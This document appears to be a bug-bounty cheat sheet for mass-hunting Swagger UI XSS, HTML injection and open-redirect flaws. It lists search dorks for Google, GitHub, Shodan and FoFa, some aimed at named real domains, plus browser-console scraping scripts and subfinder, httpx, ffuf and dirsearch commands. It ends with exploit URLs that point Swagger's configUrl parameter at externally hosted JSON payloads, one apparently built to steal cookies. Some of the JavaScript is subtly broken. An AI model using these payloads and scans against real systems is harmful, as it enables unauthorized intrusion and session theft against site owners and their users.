Swagger XSS/Html/OpenRedirect Mass Hunting by coffinxp:

Google Dork:
site:*.swagger.io -www
intitle:"Swagger UI" intitle:"Swagger UI" site:target.com
site:nasa.gov inurl:(swagger-ui OR swagger.json OR swagger.yaml)
inurl:"/swagger-ui/index.html"

intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR
inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:nasa.gov
site:nasa.gov (inurl:api OR inurl:apis OR inurl:graphql OR inurl:swagger OR inurl:v1 OR inurl:v2 OR inurl:v3) (filetype:json OR filetype:yaml OR
filetype:xml)

Github Dork:
/swagger-ui-dist" : "3.[1-3]/path/*/package.json
repo:ORG/REPO "https:///" OR "http:///" OR ".com"
repo:strap1/strapi ("https:///" OR "http:///" OR ".com")

Gitleaks Search:
- services.endpoints.http.body:{"swagger", "swagger-ui"}
web.endpoints.http.body:{"swagger", "swagger-ui"}
host.services.endpoints.http.body:{"swagger", "swagger-ui"} or web.endpoints.http.body:{"swagger", "swagger-ui"}

FoFa-Query:
"redacted.com" && (icon_hash="-1189440057" || icon_hash="-1128940573" || icon_hash="-1839822816" || icon_hash="-1120729672")

Shodan-Query:
http.component:"Swagger"
http.title:"Swagger UI"
http.html:"swagger-ui"
http.component:"Swagger" http.title:"Swagger UI" http.html:"swagger-ui"
http.favicon.hash:"-1128940573"
http.title:"Swagger UI" +280
http.title:"Swagger UI" hostname:"getsling.com"


use shordan web browser download ip and domain f12 clonsone log paste

var ipElements = document.querySelectorAll('strong'), ips = []; ipElements.forEach(function(e) {
    var t = e.innerHTML.replace(/[\[\]g, '').trim(); /([d{1,3}.]{3}[d{1,3})/.test(t) && ips.push(t); /([a-zA-Z0-9.-]+[a-zA-Z]{2,}$)/.test(t) && domains.push(t)
}); var dataString = 'IPs:\n' + ips.join('\n') + '\n\nDomains:\n' + domains.join('\n'), a = document.createElement('a'); a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(dataString); a.download = 'domains.txt'; document.body.appendChild(a); a.click();

var ipElements = document.querySelectorAll('strong'); var ips = []; ipElements.forEach(function(e) { ips.push(e.innerHTML.replace(/[\[\]g, '')) }); var ipsString = ips.join('\n'); var a = document.createElement('a'); a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(ipsString); a.download = 'ip.txt'; document.body.appendChild(a); a.click();





Chaining subfinder and httpx:


subfinder -d target.com -all | httpx-toolkit -silent -title | grep "Swagger UI"

cat swagger.txt | httpx-toolkit -silent -title | grep -Ei "Swagger | openapi | redoc | rapidoc"

echo "target.com" | httpx-toolkit -path /docs, /swagger, /api-docs, /swagger-ui, /swagger-ui.html


Bruteforce:

ffuf -w /root/wordlist/api/swagger.xss.txt -u https://xyz.com/FUZZ -mc 200 

dirsearch -u https://competitionsmanager.fsdfd.com -w /home/rajeev/Downloads/swagger-wordlist.txt  -e html,json,yaml,js -t 20 --random-agent --force-recusive --full-url


https://tat.coom/api/swagger/ui/index?configurl=https://

https://competitionsmanager.global.com/swagger/ui/index?configUrl=https://github.com/coffinxp/swagger/blob/main/login.json

https://competitionsmanager.global.com/swagger/ui/index?configUrl=https://github.com/coffinxp/swagger/blob/main/rlogin.json

https://competitionsmanager.global.com/swagger/ui/index?configUrl=https://github.com/coffinxp/swagger/blob/main/xsscookie.json

https://competitionsmanager.global.com/swagger/ui/index?configUrl=https://github.com/coffinxp/swagger/blob/main/xsstest.json

